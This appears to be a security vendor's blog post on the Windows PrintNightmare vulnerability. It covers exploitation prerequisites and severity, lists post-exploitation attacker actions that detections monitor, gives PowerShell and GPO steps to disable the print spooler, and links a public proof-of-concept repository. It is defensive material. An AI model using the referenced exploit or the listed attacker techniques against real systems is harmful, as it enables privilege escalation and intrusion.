Exploit Background
At the start of this month, a proof of concept for a Microsoft print spooler vulnerability rocked Windows admins, causing a clamor to contain the worst of the damage. This vulnerability is covered under CVE-2021-34527.

Originally beginning as a marked ‘low severity’ vulnerability, a proof of concept showed the ease at which this patched vulnerability would be exploited for an easy escalation of privileges. In order to exploit this vulnerability, an attacker need only find a system with:

  • An enabled Print Spooler service
  • Network connectivity
  • A password for another user/account on the system, including system accounts

Notably, this vulnerability can allow for lateral movement and obtainment of heightened privileges within the network. While this is concerning, its occurrence means that the attacker is already within the network and at a later phase in the kill chain.

Also of note is the fact that this vulnerability is limited to local privilege escalation only if the affected machines are patched. If they are not patched, the original remote code execution vulnerability is also still of concern.

There are now a multitude of proof of concepts in various languages. One such release is from user ‘anyu’ on Github, available here.

This vulnerability heightened to a critical severity on July 6th for several reasons:

  • Networked attack - this is a much faster and convenient vector than dealing with physical access
  • Low privileges required - even a guest account or system account (therefore an application) can take advantage
  • No user interaction necessary
  • No patch available

This being said, the impact of a privilege escalation of this sort could be very severe, allowing for covert access to private data without alarm. A privilege escalation of this type, spread far enough, can allow an attacker to push malicious software en masse to all networked machines or access administrator controls to further foothold in a network.

Automation Logic
The threat of privilege escalation typically can have a few larger connotations and uses to the attacker. In this case, an attacker may do one or multiple of the following:

  • Install/deploy additional accounts
  • Schedule chron jobs
  • Dump password hashes
  • Enable new services
  • Download and run new executables
  • Run malicious powershell scripts

Thankfully, existing LogicHub MDR detections already search for events of the above types, meaning that active exploitation of this vulnerability is already under direct monitoring and reporting. No additional infrastructure is required to ensure monitoring coverage against this CVE for MDR customers. (LogicHub SOAR customers who wish to implement these detections in their own environments should contact their customer service manager).

According to LogicHub Threat Detection Lead Anthony Morris, this may be one of the best ways to detect vulnerabilities of this type.

“The focus of my detection content is not to detect any of the 5,152 things that emerged in the last   3 months- of which this is just two of them... the focus of the detection content is to identify     malicious actors acting on objectives.”

Considering the high count of CVEs that are added to monitoring daily, it makes sense to focus on the ‘what’ (that is, the events that occur) rather than the ‘how’ (specific CVEs and methodology). While knowing popular methods of action is important, a mountain of separate CVE detections, especially with this sort of vulnerability, may only complicate how active events are found. In the end, the largest concern of any monitoring team is the result of the actions on the objective.

PrintNightmare targets users with an enabled Print Spooler service, so office environments and those who use printers most often (or even the Print to PDF feature) should take extra care as they cannot disable the service. These machines should be carefully monitored and their networked connections limited. The following methods are used to disable Print Spooler via GPO or Powershell on a single machine:

Powershell Stop-Service -Name Spooler -Force Set-Service -Name Spooler -StartupType Disabled

GPO Adjust under “Policies/Windows Settings/Security Settings/System Services/Print Spooler”

All administrators should also ensure that those who do not need Print Spooler should have it completely turned off, and that all roles and users follow the ‘least privilege’ access ideology. Limitations should be placed on the access control list in the ‘System32/spool/drivers’ directory, given that no other restrictions are possible.

The PrintNightmare vulnerability has no known full remediation and is of foremost concern due to active exploitation in the wild.

Recommended Sources
Afwu. “Afwu/PrintNightmare.” GitHub, 2021, github.com/afwu/PrintNightmare .

Hammond, John. “Critical Vulnerability: PrintNightmare Exposes Windows Servers to Remote Code Execution.” Huntress, 2021, www.huntress.com/blog/critical-vulnerability-printnightmare-exposes-windows-servers-to-remote-code-execution.

Naraine, Ryan. “Windows Admins Scrambling to Contain 'PrintNightmare' Flaw Exposure.” SecurityWeek, 2021, www.securityweek.com/windows-admins-scrambling-contain-printnightmare-flaw-exposure.

Sandbu, Marius. “PrintNightmare – CVE-2021-1675.” Marius Sandbu (Personal Portfolio), 6 July 2021, webcache.googleusercontent.com/search?q=cache%3AMi7jr9K3R6UJ%3Ahttps%3A%2F%2Fmsandbu.org%2Fprintnightmare-cve-2021-1675%2F%2B&cd=2&hl=en&ct=clnk&gl=us.

“Security Update Guide - CVE-2021-34527.” Microsoft Security Response Center, 2021, msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527.


Related Posts

September 13, 2022 Kumar Saurabh

Why No Code Solutions Are a Double-Edged Sword

Most out-of-the-box security automation is based on a simple logic — essentially, if “this”...

Learn More

August 16, 2022 Willy Leichter

Understanding MDR, XDR, EDR and TDR

A program with proper threat detection and response (TDR) has two key pillars: understanding the...

Learn More

August 9, 2022 Willy Leichter

Intuition vs. Automation: What Man and Machine Bring to Data Security

Cybersecurity experts Colin Henderson and Ray Espinoza share their take on the automation-driven...

Learn More

August 2, 2022 Anthony Morris

Using AI/ML to Create Better Security Detections

The blue-team challenge Ask any person who has interacted with a security operations center (SOC)...

Learn More

July 26, 2022 Willy Leichter

How to Select the Right MDR Service

It can be difficult to understand the differences between the various managed detection and...

Learn More

July 21, 2022 Willy Leichter

The Evolving Role of the SOC Analyst

As the cyber threat landscape evolves, so does the role of the security operations center (SOC)...

Learn More

July 19, 2022 Kumar Saurabh

Life, Liberty, and the Pursuit of Security

As cyber threats evolve, organizations of all sizes need to ramp up their security efforts....

Learn More

July 15, 2022 Tessa Mishoe

LogicHub Security RoundUp: July 2022

Hello, and welcome to the latest edition of the LogicHub Monthly Update! Each month we’ll be...

Learn More

July 12, 2022 Willy Leichter

Security Tools Need to Get with the API Program

No cloud API is an island The evolution of cloud services has coincided with the development of...

Learn More

July 6, 2022 Willy Leichter

Why the Rush to MDR?

LogicHub recently published a survey conducted by Osterman Research, looking at changing trends and...

Learn More